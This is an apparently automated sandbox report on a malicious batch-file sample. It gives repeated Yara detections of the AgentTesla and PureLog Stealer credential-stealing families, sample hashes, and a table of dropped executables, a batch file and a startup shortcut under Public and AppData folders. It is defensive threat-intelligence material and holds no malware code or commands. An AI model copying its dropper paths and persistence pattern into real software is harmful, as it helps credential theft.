Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1545203
Product:	CloudBasic
Start time:	08:34:06
Start date:	30.10.2024
Sample:	z1Transaction_ID_REF2418_cmd.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	597443c0b1405f3deaa48eef7de516c4
SHA1:	8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256:	553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
Filetype:	Microsoft Cabinet Archive (8008/1) 99.91%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\Cllyjbrx.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF">), ASCII text, with CRLF line terminators	E9DEFC5F517D7E26B9398584079F580C	BE4C94E82E6215DEBB6BBE83193681518D197FEE	857F6D8793545669B1DA61A916D1AA73DB9ABB66FA6769E0961DEC622791BA20
C:\Users\Public\Libraries\Cllyjbrx.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	08C4AFC4A714EDFE9F2554B72DA40A04	C5BF192E4258D42C359504997FDDAB6BF812E2F9	64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
C:\Users\Public\Libraries\PNO	ASCII text, with CRLF line terminators	FFED080BF0C3B454B4D2873AF298511E	33B86DCB41B307CE92537C42466B3AC65FA75340	2B3275E2630092BE620791E92F0B2D759BA133346CE66FEE677F3EFF5A23D48E
C:\Users\Public\Libraries\xrbjyllC.cmd	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators	B87F096CBC25570329E2BB59FEE57580	D281D1BF37B4FB46F90973AFC65EECE3908532B2	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
C:\Users\Public\Libraries\xrbjyllC.pif	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
C:\Users\Public\alpha.pif	PE32 executable (console) Intel 80386, for MS Windows	D0FCE3AFA6AA1D58CE9FA336CC2B675B	4048488DE6BA4BFEF9EDF103755519F1F762668F	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
C:\Users\user\AppData\Local\Temp\x.exe	PE32 executable (GUI) Intel 80386, for MS Windows	08C4AFC4A714EDFE9F2554B72DA40A04	C5BF192E4258D42C359504997FDDAB6BF812E2F9	64E1D81708B22A034F42FEE4DCDDB6B90A191A0F1B0A2754E8F82A1723675AB5
C:\Users\user\AppData\Roaming\sgxIb\Loader.Log	ASCII text, with CRLF line terminators	43429641FC18329AA43C377CA931E2CC	A8123D641DC6B48F1B7601449A62BEE33BFDFEDA	1B885BD7265A6C07E59D16DE6CF05575F47BDF6592C145DD6D369CE5C2976C80
C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	PE32 executable (GUI) Intel 80386, for MS Windows	C116D3604CEAFE7057D77FF27552C215	452B14432FB5758B46F2897AECCD89F7C82A727D	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	343E954129C332E60D8F9B55145CA365	F8C444B41CE20EA1C82A14248F3A06C4425BDD50	89A065092A8F23911A56253F3A01ABF3E3109C5523E8ACDD20070FE3C221A243
\Device\Null	ASCII text, with CRLF, CR line terminators	A6FADC7AC568000B6EBB2798B26B2747	8AE2FC2A2AF6E8D45E04D55E7A0EF80CD1452C05	CE127301AD198410E2CEA6A5F94C859AAFDE68A823437C5E6F6741FA08AF2447

Windows Analysis Report z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Malware Threat Intel
Provided by